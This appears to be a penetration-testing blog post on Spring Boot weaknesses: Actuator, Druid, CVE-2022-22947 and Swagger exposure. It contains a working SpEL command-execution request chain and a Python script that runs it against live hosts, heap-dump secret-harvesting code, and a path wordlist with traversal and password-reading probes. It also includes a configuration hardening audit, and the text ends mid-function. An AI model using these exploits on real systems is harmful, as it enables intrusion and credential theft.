2026/4/14 15:00:23
Preface

As the Internet keeps growing, web development moves faster and faster, and more companies pick a framework to stand up their systems quickly. Among the many frameworks, Spring Boot is popular with developers because it is simple and efficient.

A brief introduction to Spring Boot: it is an open-source framework from the Pivotal team that simplifies creating and deploying Spring applications. It ships rich, modular Spring support so that developers can build enterprise applications more easily and quickly. Its auto-configuration cuts complexity, and it works with many JVM-based open-source frameworks, which shortens development time and makes development simpler and more efficient. A quick look at any search engine shows how popular Spring Boot is.

Common vulnerabilities

Spring Boot Actuator unauthorized access

Most testers know Actuator already: it is the service monitoring and management component that ships with Spring Boot. When a Spring Boot application starts, Actuator registers a number of endpoints with the request routing automatically. When those endpoints are misconfigured they can leak system information or even lead to RCE.

In Spring Boot 1.x the endpoints are registered under the root URL; in Spring Boot 2.x they moved under /actuator/. The commonly used endpoints, per the official documentation, are listed below.

Most endpoints are not reachable out of the box. In 2.x only /health and /info are exposed over HTTP by default (recent versions expose only /health), and the rest must be opened with management.endpoints.web.exposure.include. In 1.x the endpoints marked sensitive are protected by the security configuration, and setting management.security.enabled=false turns that protection off, which is the misconfiguration most often found.

/auditevents: lists security-audit events such as user login and logout; can be filtered by principal or type, among other fields.
/beans: returns every bean available in the BeanFactory; unlike /auditevents it cannot be filtered.
/conditions: formerly /autoconfig; reports the auto-configuration conditions that were evaluated.
/configprops: lists all @ConfigurationProperties beans.
/env: returns the current Environment properties; a single property can also be retrieved (/env/{name}).
/flyway: details of Flyway database migrations.
/health: summarises the application's health.
/heapdump: builds and returns a heap dump of the JVM the application runs in.
/info: general information; can be custom data, build information or details of the latest commit.
/liquibase: behaves like /flyway, but for Liquibase.
/logfile: returns the ordinary application log.
/loggers: query and modify the application's logging levels.
/metrics: application metrics, both generic and custom.
/prometheus: the same metrics, formatted so a Prometheus server can scrape them.
/scheduledtasks: details of every scheduled task in the application.
/sessions: lists HTTP sessions, provided Spring Session is in use.
/shutdown: gracefully shuts the application down.
/threaddump: dumps the thread information of the underlying JVM.

When endpoints such as heapdump, env and threaddump are reachable without authentication, we can pull sensitive server information out of them, such as OSS keys, database passwords, Redis passwords and environment configuration, leading to information disclosure and, in the worst case, loss of the system to the attacker. Note that /env masks the values of properties whose names contain password, secret, key or token as ******, but the heap dump holds those same values in clear text, and property names that dodge the mask (pass, pwd and the like) are returned as is.

Case

This is a heapdump leak found during one engagement: from it we recovered the database password, the Redis password, and the appid and appsecret of a WeChat official account, and used them to take over the account.

Druid misconfiguration

Strictly speaking this is not a Spring Boot vulnerability; it comes from leaving the Druid monitoring console without access control, or protecting it with a weak password. When Druid has no authentication configured we can read its configuration directly by visiting url/xxxx/druid/basic.json. When the password is weak we can log in to the console and, among other things, look at the recorded web sessions (/druid/websession.html) and request URIs, and use them to obtain the corresponding privileges in the system.

Spring Cloud Gateway RCE (CVE-2022-22947)

Adapted from the CSDN post "CVE-2022-22947 Spring Cloud Gateway RCE vulnerability analysis and reproduction": https://blog.csdn.net/qq_50808416/article/details/130677837

Because Spring Cloud Gateway is itself a microservice application, Actuator can manage it too, and the gateway actuator endpoint exposes the route table for reading and writing. This vulnerability abuses that endpoint: when we see the gateway endpoint present, we create a route whose filter argument contains a SpEL expression; the expression is evaluated on the server when the routes are refreshed, which gives remote code execution. Affected versions are 3.1.0 and 3.0.0 through 3.0.6 (plus older, unsupported releases); the fix is in 3.1.1 and 3.0.7. The endpoint has to be exposed over HTTP (management.endpoints.web.exposure.include contains gateway or *) for the attack to work.

Create the route:

    POST /actuator/gateway/routes/test HTTP/1.1
    Host: 192.168.2.131:8080
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
    Connection: close
    Content-Type: application/json
    Content-Length: 331

    {"id":"test","filters":[{"name":"AddResponseHeader","args":{"value":"#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}","name":"result"}}],"uri":"http://example.com:80","order":0}

Refresh the routes (this is the step that evaluates the expression):

    POST /actuator/gateway/refresh HTTP/1.1
    Host: 192.168.2.131:8080
    Connection: close
    Content-Type: application/x-www-form-urlencoded

Read the new route back; the output of the command (here whoami) appears in the filter's argument value:

    GET /actuator/gateway/routes/test HTTP/1.1
    Host: 192.168.2.131:8080
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close

Once done, delete the route with DELETE /actuator/gateway/routes/test and refresh again; otherwise the route, and the command output inside it, stays on the gateway.

Swagger unauthorized access

Swagger generates API documentation for you as you write your interfaces, as long as you follow its conventions and add a few descriptive annotations. When it is misconfigured the interface documentation is exposed, and when authorization on the documented interfaces is also mishandled the result is broken access control and information disclosure. On Spring Boot the UI usually lives at /swagger-ui.html (springfox) or /swagger-ui/index.html (springdoc), and the machine-readable spec at /v2/api-docs or /v3/api-docs.

Summary of common paths

Below are paths commonly found on Spring Boot applications; using them while scanning a Spring Boot target gets twice the result for half the effort. Some entries probe specific components (Swagger, Druid, Jolokia, Nacos, Spring Cloud Gateway, Eureka) and some probe path-handling quirks (the %20 and ../ variants).

/
/#/wallboard
/%20/swagger-ui.html
/Swagger/ui/index
/acl/article?id=66
/acm
/actuator
/actuator/#/wallboard
/actuator/acm
/actuator/admin/swagger-ui.html
/actuator/api-docs
/actuator/api.html
/actuator/api/index.html
/actuator/api/swagger-ui.html
/actuator/api/v2/api-docs
/actuator/api/v2/swagger.json
/actuator/archaius
/actuator/article?id=${7*7}
/actuator/article?id=66
/actuator/auditLog
/actuator/auditevents
/actuator/autoconfig
/actuator/beans
/actuator/beans1
/actuator/caches
/actuator/caches/cache
/actuator/channels
/actuator/conditions
/actuator/conditions1
/actuator/configprops
/actuator/configurationMetadata
/actuator/distv2/index.html
/actuator/docs
/actuator/druid/login.html
/actuator/dubbo-provider/distv2/index.html
/actuator/dump
/actuator/env
/actuator/env/java.home
/actuator/env/spring.jmx.enabled
/actuator/env/system
/actuator/events
/actuator/exportRegisteredServices
/actuator/features
/actuator/flyway
/actuator/gateway
/gateway
/actuator/h2-console
/actuator/health
/actuator/health/
/actuator/healthcheck
/actuator/heapdump
/actuator/httptrace
/actuator/hystrix.stream
/actuator/hystrix.stream/*
/actuator/info
/actuator/integrationgraph
/actuator/intergrationgraph
/actuator/jolokia
/actuator/jolokia/*
/actuator/jolokia/list
/actuator/liquibase
/actuator/logfile
/actuator/loggers
/actuator/loggers/
/actuator/loggingConfig
/actuator/management/heapdump
/actuator/mappings
/actuator/metrics
/actuator/metrics/
/actuator/monitor/auditevents
/actuator/monitor/conditions
/actuator/monitor/env
/actuator/monitor/loggers
/actuator/monitor/mappings
/actuator/monitor/scheduledtasks
/actuator/monitor/threaddump
/actuator/peripheral/swagger-ui.html
/actuator/peripheral/v2/api-docs
/actuator/prometheus
/actuator/refresh
/actuator/registeredServices
/actuator/releaseAttributes
/actuator/resolveAttributes
/actuator/restart
/actuator/scheduledtasks
/actuator/sentinel
/actuator/service-registry
/actuator/sessions
/actuator/sessions/
/actuator/shutdown
/actuator/spring-security-oauth-resource/swagger-ui.html
/actuator/spring-security-rest/api/swagger-ui.html
/actuator/springWebflow
/actuator/sso
/actuator/ssoSessions
/actuator/static/swagger.json
/actuator/statistics
/actuator/status
/actuator/sw/swagger-ui.html
/actuator/swagger
/actuator/swagger-dubbo/api-docs
/actuator/swagger-resourcesce
/actuator/swagger-ui
/actuator/swagger-ui.html
/actuator/swagger-ui/index.html
/actuator/swagger/codes
/actuator/swagger/index.html
/actuator/swagger/static/index.html
/actuator/system/
/actuator/system/env
/actuator/system/mappings
/actuator/system/showOsInfo
/actuator/system/showProperties
/actuator/template/swagger-ui.html
/actuator/threaddump
/actuator/tra
/actuator/trace
/actuator/user/swagger-ui.html
/admin/swagger-ui.html
/api
/api-docs
/api-docs/swagger.json
/api.html
/api/api-docs
/api/apidocs
/api/doc
/api/index.html
/api/swagger
/api/swagger-resources
/api/swagger-ui
/api/swagger-ui.html
/api/swagger-ui.json
/api/swagger.json
/api/swagger/
/api/swagger/ui
/api/swaggerui
/api/v1/
/api/v1/api-docs
/api/v1/apidocs
/api/v1/login
/api/v1/swagger
/api/v1/swagger-resources
/api/v1/swagger-ui
/api/v1/swagger-ui.html
/api/v1/swagger-ui.json
/api/v1/swagger.json
/api/v1/swagger/
/api/v2
/api/v2/api-docs
/api/v2/apidocs
/api/v2/login
/api/v2/swagger
/api/v2/swagger-resources
/api/v2/swagger-ui
/api/v2/swagger-ui.html
/api/v2/swagger-ui.json
/api/v2/swagger.json
/api/v2/swagger/
/api/v3
/apidocs
/apidocs/swagger.json
/article?id=${7*7}
/article?id=66
/auditevents
/autoconfig
/beans
/beans1
/caches
/channels
/clients
/clients/all
/clients/saveOrUpdate
/cloudfoundryapplication
/conditions
/conditions1
/configprops
/distv2/index.html
/doc.html
/docs
/docs/
/druid/*
/druid/api.html
/druid/basic.json
/druid/datasource.html
/druid/index.html
/druid/login.html
/druid/spring.html
/druid/sql.html
/druid/wall.html
/druid/webapp.html
/druid/websession.html
/druid/weburi.html
/dubbo-provider/distv2/index.html
/dump
/entity/all
/env
/env/
/env/(name)
/env/java.home
/env/spring
/env/spring.jmx.enabled
/env/{name}
/error
/eureka
/eureka/*
/features
/flyway
/gateway/actuator
/gateway/actuator/auditevents
/gateway/actuator/beans
/gateway/actuator/conditions
/gateway/actuator/configprops
/gateway/actuator/env
/gateway/actuator/health
/gateway/actuator/heapdump
/gateway/actuator/httptrace
/gateway/actuator/hystrix.stream
/gateway/actuator/info
/gateway/actuator/jolokia
/gateway/actuator/logfile
/gateway/actuator/loggers
/gateway/actuator/mappings
/gateway/actuator/metrics
/gateway/actuator/scheduledtasks
/gateway/actuator/swagger-ui.html
/gateway/actuator/threaddump
/gateway/actuator/trace
/get
/graphql
/h2-console
/health
/health/
/heapdump
/heapdump.json
/httptrace
/hystrix
/hystrix.stream
/info
/intergrationgraph
/jolokia
/jolokia/exec/org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager/getProperty/spring.datasource.password
/jolokia/exec/org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager/getProperty/spring.datasource.url
/jolokia/list
/lastn
/libs/swaggerui
/liquibase
/list
/log/view?filename=/etc/passwd&base=../../../../../../../../../../
/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
/logfile
/loggers
/login
/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../
/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
/management/heapdump
/mappings
/metrics
/metrics/
/metrics/mem
/metrics/{name}
/monitor
/monitor/auditevents
/monitor/beans
/monitor/conditions
/monitor/configprops
/monitor/env
/monitor/health
/monitor/heapdump
/monitor/httptrace
/monitor/hystrix.stream
/monitor/info
/monitor/jolokia
/monitor/loggers
/monitor/mappings
/monitor/metrics
/monitor/scheduledtasks
/monitor/threaddump
/oauth/authorize
/oauth/check_token
/oauth/client/token
/oauth/confirm_access
/oauth/error
/oauth/get/token
/oauth/refresh/token
/oauth/remove/token
/oauth/token
/oauth/token/list
/oauth/user/token
/oauth/userinfo
/peripheral/swagger-ui.html
/peripheral/v2/api-docs
/prometheus
/redis/keysSize
/redis/memoryInfo
/refresh
/restart
/scheduledtasks
/services
/services/1
/services/findAlls
/services/findOnes
/services/granted
/services/saveOrUpdate
/sessions
/shutdown
/spring-security-oauth-resource/swagger-ui.html
/spring-security-rest/api/swagger-ui.html
/static/swagger.json
/sw/swagger-ui.html
/swagger
/swagger-dubbo/api-docs
/swagger-resources
/swagger-resources/configuration/security
/swagger-resources/configuration/ui
/swagger-ui
/swagger-ui.html
/swagger-ui.html#
/swagger-ui.json
/swagger-ui/html
/swagger-ui/index.html
/swagger-ui/swagger.json
/swagger.json
/swagger.yml
/swagger/
/swagger/codes
/swagger/index.html
/swagger/static/index.html
/swagger/swagger-ui.html
/swagger/ui
/swagger/v1/swagger.json
/swagger/v2/swagger.json
/system/
/system/druid/index.html
/system/druid/login.html
/system/druid/websession.html
/system/env
/system/mappings
/system/showOsInfo
/system/showProperties
/template/swagger-ui.html
/threaddump
/trace
/trace/
/uc/env
/user/swagger-ui.html
/v1.1/swagger-ui.html
/v1.2/swagger-ui.html
/v1.3/swagger-ui.html
/v1.4/swagger-ui.html
/v1.5/swagger-ui.html
/v1.6/swagger-ui.html
/v1.7/swagger-ui.html
/v1.8/swagger-ui.html
/v1.9/swagger-ui.html
/v1/agent/self
/v1/api-docs
/v1/catalog/service/app
/v1/catalog/services
/v1/swagger.json
/v2.0/swagger-ui.html
/v2.1/swagger-ui.html
/v2.2/swagger-ui.html
/v2.3/swagger-ui.html
/v2/api-docs
/v2/api-docs?group=swagger接口文档
/v2/swagger.json
/v3/api-docs
/validata/code
/version
/webpage/system/druid/index.html
/webpage/system/druid/login.html
/webpage/system/druid/websession.html
/actuator/gateway/routes
/actuator/get
/gateway/routes/new_route
/actuator/gateway/routes/new_route
/new_route
/actuator/gateway/refresh
/gateway/refresh
/actuator/gateway/globalfilters
/actuator/gateway/routefilters
/actuator/gatewayroutes/1
/actuator/nacos
/actuator/nacos-config
/actuator/nacos-discovery
/actuator/nacosconfig
/actuator/nacos/v1/cs/configs
/actuator/nacos/v1/cs/configs?dataId=Misplaced
/actuator/nacos/v1/ns/instance
/actuator/nacos/v1/ns/instance?serviceName=springboot2-nacos-discovery
/actuator/nacos/v2/cs/configs
/actuator/nacos/v2/cs/configs?dataId=Misplaced
/actuator/nacos/v2/ns/instance
/actuator/nacos/v2/ns/instance?serviceName=springboot2-nacos-discovery
/actuator/nacos/v1/service/list?pageSize=123&groupname=default_group&encoding=utf-8
/actuator/nacos/v2/service/list?pageSize=123&groupname=default_group&encoding=utf-8
/nacos
/nacos/v1/cs/configs
/nacos/v1/cs/configs?dataId=Misplaced
/nacos/v1/ns/instance
/nacos/v1/ns/instance?serviceName=springboot2-nacos-discovery
/nacos/v2/cs/configs
/nacos/v2/cs/configs?dataId=Misplaced
/nacos/v2/ns/instance
/nacos/v2/ns/instance?serviceName=springboot2-nacos-discovery
/nacos/v1/service/list?pageSize=123&groupname=default_group&encoding=utf-8
/nacos/v2/service/list?pageSize=123&groupname=default_group&encoding=utf-8
/v1/cs/configs
/v1/cs/configs?dataId=Misplaced
/v1/ns/instance
/v1/ns/instance?serviceName=springboot2-nacos-discovery
/v2/cs/configs
/v2/cs/configs?dataId=Misplaced
/v2/ns/instance
/v2/ns/instance?serviceName=springboot2-nacos-discovery
/v1/service/list?pageSize=123&groupname=default_group&encoding=utf-8
/v2/service/list?pageSize=123&groupname=default_group&encoding=utf-8
/nacos/v3/cs/configs
/nacos/v3/cs/configs?dataId=Misplaced
/nacos/v3/ns/instance
/nacos/v3/ns/instance?serviceName=springboot2-nacos-discovery
/nacos/v3/service/list?pageSize=123&groupname=default_group&encoding=utf-8
/v3/cs/configs
/v3/cs/configs?dataId=Misplaced
/v3/ns/instance
/v3/ns/instance?serviceName=springboot2-nacos-discovery
/v3/service/list?pageSize=123&groupname=default_group&encoding=utf-8
/actuator/nacosdiscovery
/actuator/health/nacos
/actuator/loggers/nacos
/actuator/metrics/nacos
/env/nacos
/get?serviceName=springboot2-nacos-discovery
/metrics/nacos
/webjars/**
/actuator/nacos/config
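The Actuator section above says that /env masks credential-like values while /heapdump still carries them in clear text, and the heapdump case shows what that yields. The following script, an added example that is not code from the original post, puts both claims to work: it flattens either /env layout (1.x and 2.x/3.x), reports which sensitive properties came back masked versus exposed, and runs a strings-style scan over a heap dump. Every input is a constructed sample, including the fake HPROF bytes; the regexes are this example's own and are deliberately wider than Boot's sanitizer.

```python
"""Pull candidate secrets out of Spring Boot Actuator output.

Added example, not code from the original post. It handles both JSON
layouts /env has used (1.x: one map per property source; 2.x/3.x: a
"propertySources" list) and does a strings-style scan of a heapdump,
where values that /env masks as "******" still sit in clear text.
All inputs below are constructed samples, not real captures.
"""
import gzip
import re

# Names that usually hold credentials. Wider than Boot's own sanitizer
# (password|secret|key|token|credentials), so names such as "mq.pass" or
# "minio.pwd" that Boot leaves unmasked are still reported.
SENSITIVE_NAME = re.compile(r"pass|pwd|secret|token|key|credential", re.I)
# Values that carry credentials whatever the property is called:
# "...?user=x&password=y" in a JDBC URL, or "scheme://user:pass@host".
SENSITIVE_VALUE = re.compile(r"(password|passwd|pwd|secret|token)=|://[^/\s@]*:[^/\s@]+@", re.I)
MASK = "******"


def flatten_env(env):
    """Return {property: value} from either /env layout; first source wins, as in Boot."""
    props = {}
    if "propertySources" in env:                    # Spring Boot 2.x / 3.x
        for source in env["propertySources"]:
            for name, entry in source.get("properties", {}).items():
                props.setdefault(name, entry.get("value"))
    else:                                           # Spring Boot 1.x
        for values in env.values():
            if isinstance(values, dict):
                for name, value in values.items():
                    props.setdefault(name, value)
    return props


def find_secrets(env):
    """Split sensitive-looking properties into exposed {name: value} and masked [name]."""
    exposed, masked = {}, []
    for name, value in flatten_env(env).items():
        value = "" if value is None else str(value)
        if value == MASK:
            masked.append(name)
        elif SENSITIVE_NAME.search(name) or SENSITIVE_VALUE.search(value):
            exposed[name] = value
    return {"exposed": exposed, "masked": masked}


HPROF_MAGIC = b"JAVA PROFILE"
HEAP_PATTERNS = [
    re.compile(rb"jdbc:[a-z0-9]+://[^\x00\s\"']{4,}", re.I),
    re.compile(rb"redis://[^\x00\s\"']{4,}", re.I),
    re.compile(rb"[\w.\-]*(?:password|passwd|pwd|secret|token)[=:][^\x00\s\"',;&]{4,}", re.I),
]


def scan_heapdump(data):
    """Return credential-looking strings found in a heap dump (raw HPROF or gzip-wrapped)."""
    if data[:2] == b"\x1f\x8b":                    # some downloads arrive gzip-compressed
        data = gzip.decompress(data)
    if not data.startswith(HPROF_MAGIC):
        raise ValueError("not an HPROF heap dump")
    hits = []
    for pattern in HEAP_PATTERNS:
        for match in pattern.finditer(data):
            text = match.group(0).decode("utf-8", "replace")
            if text not in hits:
                hits.append(text)
    return hits


ENV_2X = {   # constructed /actuator/env (Boot 2.x) response
    "activeProfiles": ["prod"],
    "propertySources": [
        {"name": "systemProperties",
         "properties": {"java.home": {"value": "/usr/lib/jvm/java-11"}}},
        {"name": "applicationConfig: [classpath:/application.yml]",
         "properties": {
             "spring.datasource.url": {"value": "jdbc:mysql://10.0.0.5:3306/app?user=app&password=Pr0d!Passw0rd"},
             "spring.datasource.password": {"value": MASK},
             "spring.redis.password": {"value": MASK},
             "mq.pass": {"value": "guest123"},          # name escapes Boot's mask
             "wechat.appsecret": {"value": MASK},
         }},
    ],
}
ENV_1X = {   # constructed /env (Boot 1.x) response
    "profiles": ["prod"],
    "systemProperties": {"java.home": "/usr/lib/jvm/java-8"},
    "applicationConfig: [classpath:/application.properties]": {
        "spring.datasource.password": MASK,
        "minio.pwd": "minio123",                      # name escapes Boot's mask
    },
}
HEAP = (b"JAVA PROFILE 1.0.2\x00" + b"\x00\x00\x00\x08" + b"\x00" * 12   # constructed, not a real dump
        + b"jdbc:mysql://10.0.0.5:3306/app?useSSL=false\x00"
        + b"spring.datasource.password=Pr0d!Passw0rd\x00"
        + b"redis://:r3dis@10.0.0.6:6379\x00" + b"\x01\x02" * 8)
HEAP_GZ = gzip.compress(HEAP)                          # the gzip-wrapped download case

if __name__ == "__main__":
    print(find_secrets(ENV_2X))
    print(find_secrets(ENV_1X))
    print(scan_heapdump(HEAP))
```

On a real dump, feed the bytes from /actuator/heapdump (or /heapdump on 1.x) to scan_heapdump; a hit in the masked list from find_secrets tells you which property names to look for in the heap output.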
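The Actuator, Druid and Spring Cloud Gateway sections above each come down to configuration: which endpoints are exposed, whether the Druid console has a real password and an allow list, and whether the gateway endpoint is reachable. The audit below is an added example, not code from the post or from Spring; it reads a java.util.Properties file and flags the settings behind those exposures, with a weak configuration next to a hardened one. The property names are the documented Spring Boot and druid-spring-boot-starter keys; the severities and weak-password list are this example's own choices.

```python
"""Audit the Spring Boot settings behind the exposures discussed above:
Actuator exposure (1.x and 2.x/3.x keys), the Druid stat console, and the
Spring Cloud Gateway actuator endpoint. Added example, not code from the
post. It reads java.util.Properties text; both configurations below are
constructed. Keys are the documented Boot / Druid starter property names.
"""
import re

WEAK_PASSWORDS = {"admin", "druid", "123456", "password", "admin123", "root", "123123"}
# Endpoints whose exposure leaks data or changes state (see the endpoint list above).
SENSITIVE_ENDPOINTS = {"env", "heapdump", "threaddump", "beans", "configprops", "mappings",
                       "loggers", "shutdown", "jolokia", "httptrace", "gateway", "sessions", "logfile"}
DRUID = "spring.datasource.druid.stat-view-servlet."


def parse_properties(text):
    """Minimal .properties reader: key=value or key: value; # and ! start comments."""
    props = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line[0] in "#!":
            continue
        match = re.match(r"([^=:\s]+)\s*[=:]?\s*(.*)", line)
        if match:
            props[match.group(1)] = match.group(2).strip()
    return props


def _csv(value):
    return {item.strip() for item in value.split(",") if item.strip()}


def audit(props):
    """Return [(severity, key, finding)] for insecure settings; [] means nothing flagged."""
    get = props.get
    findings = []

    # Spring Boot 2.x/3.x: only "health" is exposed over HTTP unless include says otherwise.
    include = _csv(get("management.endpoints.web.exposure.include", "health"))
    exclude = _csv(get("management.endpoints.web.exposure.exclude", ""))
    exposed = (SENSITIVE_ENDPOINTS if "*" in include else SENSITIVE_ENDPOINTS & include) - exclude
    if exposed:
        findings.append(("high", "management.endpoints.web.exposure.include",
                         "sensitive endpoints exposed over HTTP: " + ", ".join(sorted(exposed))))
    if "shutdown" in exposed and get("management.endpoint.shutdown.enabled", "false").lower() == "true":
        findings.append(("high", "management.endpoint.shutdown.enabled", "remote shutdown is reachable"))
    # Spring Cloud Gateway's endpoint is enabled by default (when the gateway starter is present);
    # exposing it over HTTP is what opens the CVE-2022-22947 route-injection surface.
    if "gateway" in exposed and get("management.endpoint.gateway.enabled", "true").lower() == "true":
        findings.append(("critical", "management.endpoint.gateway.enabled",
                         "gateway actuator exposed: routes can be added remotely (CVE-2022-22947 surface)"))
    if get("management.endpoint.env.show-values", "never").lower() == "always":
        findings.append(("medium", "management.endpoint.env.show-values", "Boot 3 /env returns unmasked values"))
    # Spring Boot 1.x: this single switch removes authentication from sensitive endpoints.
    if get("management.security.enabled", "true").lower() == "false":
        findings.append(("high", "management.security.enabled", "Boot 1.x actuator security disabled"))
    if get("management.server.port") in (None, get("server.port", "8080")):
        findings.append(("info", "management.server.port",
                         "actuator shares the application port; move it to a management port"))

    # Druid console: off by default in the starter; when on it needs a real password and an allow list.
    if get(DRUID + "enabled", "false").lower() == "true":
        password = get(DRUID + "login-password", "")
        if not password:
            findings.append(("high", DRUID + "login-password", "Druid console enabled without a login"))
        elif password.lower() in WEAK_PASSWORDS or len(password) < 8:
            findings.append(("high", DRUID + "login-password", "Druid console password is weak"))
        if not get(DRUID + "allow"):
            findings.append(("medium", DRUID + "allow", "Druid console reachable from any source IP"))
    return findings


WEAK_CONFIG = """
# constructed: the shape of application.properties behind the findings in this post
server.port=8080
management.endpoints.web.exposure.include=*
management.endpoint.shutdown.enabled=true
spring.datasource.druid.stat-view-servlet.enabled=true
spring.datasource.druid.stat-view-servlet.login-username=admin
spring.datasource.druid.stat-view-servlet.login-password=admin
"""

HARDENED_CONFIG = """
# constructed: same application, actuator on its own port, only health exposed
server.port=8080
management.server.port=9001
management.endpoints.web.exposure.include=health
management.endpoints.web.exposure.exclude=heapdump,env,gateway
management.endpoint.shutdown.enabled=false
management.endpoint.env.show-values=never
# Druid console: strong credential, reachable from the admin network only
spring.datasource.druid.stat-view-servlet.enabled=true
spring.datasource.druid.stat-view-servlet.login-username=druid-ops
spring.datasource.druid.stat-view-servlet.login-password=R0tate-Me-Every-90d!
spring.datasource.druid.stat-view-servlet.allow=10.0.0.0/24
spring.datasource.druid.stat-view-servlet.reset-enable=false
"""

if __name__ == "__main__":
    for label, text in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label)
        for severity, key, finding in audit(parse_properties(text)):
            print(f"  [{severity}] {key}: {finding}")
```

The gateway check fires on any application that exposes * because the audit cannot see the classpath; treat it as a reason to look for spring-cloud-starter-gateway in the build rather than as proof. A separate management port plus a network restriction on it is the change that removes most of the findings at once.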
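The three raw requests in the Spring Cloud Gateway section form one chain: create the route, refresh, read it back, and (as the section notes) delete it again. The script below is an added example, not code from the original post or the referenced blog. It builds the same SpEL payload the post uses, drives the chain through a pluggable transport, and parses the command output out of the route read-back. The FakeGateway class is an offline stand-in whose responses mimic what the post's screenshots describe; the live transport's base URL and the route id are assumptions.

```python
"""CVE-2022-22947 request chain (create route, refresh, read back, delete).

Added example, not the original post's code. The transport is a plain
callable so the same chain runs offline against the fake gateway below,
whose behaviour mirrors the three responses shown above. The live
transport's base URL and the route id are assumptions.
"""
import json
import re
from urllib import error as urlerror, request as urlrequest


def spel_exec(argv):
    """The post's payload: SpEL that runs argv and returns its stdout as a String."""
    args = ",".join('"%s"' % a.replace('"', '\\"') for a in argv)
    return ("#{new java.lang.String(T(org.springframework.util.StreamUtils)"
            ".copyToByteArray(T(java.lang.Runtime).getRuntime()"
            ".exec(new String[]{%s}).getInputStream()))}" % args)


def route_definition(route_id, argv, header="result"):
    """Body for POST /actuator/gateway/routes/{id}; the filter arg carries the SpEL."""
    return {"id": route_id,
            "filters": [{"name": "AddResponseHeader",
                         "args": {"name": header, "value": spel_exec(argv)}}],
            "uri": "http://example.com:80",
            "order": 0}


# GET /actuator/gateway/routes/{id} renders each filter as text such as
# "[[AddResponseHeader result = 'root\n'], order = 1]"; the command output sits between the quotes.
FILTER_TEXT = re.compile(r"\[AddResponseHeader (\w+) = '(.*?)'\], order = \d+\]", re.S)


def extract_result(route_json, header="result"):
    """Pull the evaluated expression (command stdout) out of the route read-back."""
    for entry in route_json.get("filters", []):
        for name, value in FILTER_TEXT.findall(str(entry)):
            if name == header:
                return value
    return None


def exploit(send, argv, route_id="test"):
    """Run argv on the gateway; send(method, path, body, content_type) -> (status, body)."""
    path = "/actuator/gateway/routes/" + route_id
    body = json.dumps(route_definition(route_id, argv)).encode()
    status, _ = send("POST", path, body, "application/json")
    if status not in (200, 201):
        raise RuntimeError("route not created, HTTP %d" % status)
    send("POST", "/actuator/gateway/refresh", b"", "application/x-www-form-urlencoded")  # SpEL evaluated here
    status, out = send("GET", path, None, None)
    result = extract_result(json.loads(out.decode())) if status == 200 else None
    # Clean up, or the route (and the command output inside it) stays on the gateway.
    send("DELETE", path, None, None)
    send("POST", "/actuator/gateway/refresh", b"", "application/x-www-form-urlencoded")
    return result


def http_send(base_url):
    """urllib transport for a live target, e.g. http_send("http://192.168.2.131:8080")."""
    def send(method, path, body, content_type):
        req = urlrequest.Request(base_url + path, data=body, method=method)
        if content_type:
            req.add_header("Content-Type", content_type)
        try:
            with urlrequest.urlopen(req, timeout=10) as resp:
                return resp.status, resp.read()
        except urlerror.HTTPError as err:
            return err.code, err.read()
    return send


class FakeGateway:
    """Offline stand-in reproducing only the endpoint behaviour the chain depends on."""
    def __init__(self, stdout="root\n"):
        self.routes, self.stdout = {}, stdout

    def __call__(self, method, path, body, content_type):
        routes, route_id = "/actuator/gateway/routes/", path.rsplit("/", 1)[-1]
        if method == "POST" and path == "/actuator/gateway/refresh":
            for route in self.routes.values():
                route["applied"] = True            # refresh is when the SpEL runs
            return 200, b""
        if method == "POST" and path.startswith(routes):
            self.routes[route_id] = {"definition": json.loads(body), "applied": False}
            return 201, b""
        if method == "GET" and route_id in self.routes:
            route = self.routes[route_id]
            value = self.stdout if route["applied"] else route["definition"]["filters"][0]["args"]["value"]
            rendered = "[[AddResponseHeader result = '%s'], order = 1]" % value
            return 200, json.dumps({"route_id": route_id, "filters": [rendered],
                                    "uri": "http://example.com:80", "order": 0}).encode()
        if method == "DELETE" and route_id in self.routes:
            del self.routes[route_id]
            return 200, b""
        return 404, b""


if __name__ == "__main__":
    gateway = FakeGateway(stdout="root\n")
    print(repr(exploit(gateway, ["whoami"])))   # the fake returns 'root\n'; a live target returns real output
```

Against a real host, exploit(http_send("http://192.168.2.131:8080"), ["whoami"]) reproduces the post's three requests plus the clean-up. The fix is the version upgrade named above; where that is not immediate, keep gateway out of management.endpoints.web.exposure.include.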
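For the Swagger section, the useful first step after finding /v2/api-docs or /v3/api-docs is to list every documented operation and see which ones the document itself declares without a security requirement; those are where the authorization follow-up starts. The script below is an added example, not code from the post or from Swagger; it handles both the Swagger 2.0 and OpenAPI 3 shapes, and both documents in it are constructed.

```python
"""Enumerate the operations an exposed Swagger/OpenAPI document describes and
flag those declared without any security requirement. Added example, not the
post's code; it reads Swagger 2.0 (/v2/api-docs) and OpenAPI 3 (/v3/api-docs)
JSON, and the two documents below are constructed.
"""
import re
from urllib.parse import urlparse

METHODS = ("get", "post", "put", "patch", "delete", "head", "options")


def base_path(spec):
    """Swagger 2 uses basePath; OpenAPI 3 puts it in the first server URL."""
    if "swagger" in spec:
        return spec.get("basePath", "").rstrip("/")
    servers = spec.get("servers") or []
    return urlparse(servers[0].get("url", "")).path.rstrip("/") if servers else ""


def enumerate_operations(spec):
    """Return [(METHOD, path, requires_auth)] in document order.

    An operation-level "security" overrides the document-level one, and an
    explicit empty list ([]) means "no authentication", which is what to look for.
    The document is the developer's claim, not proof: confirm with a request.
    """
    base = base_path(spec)
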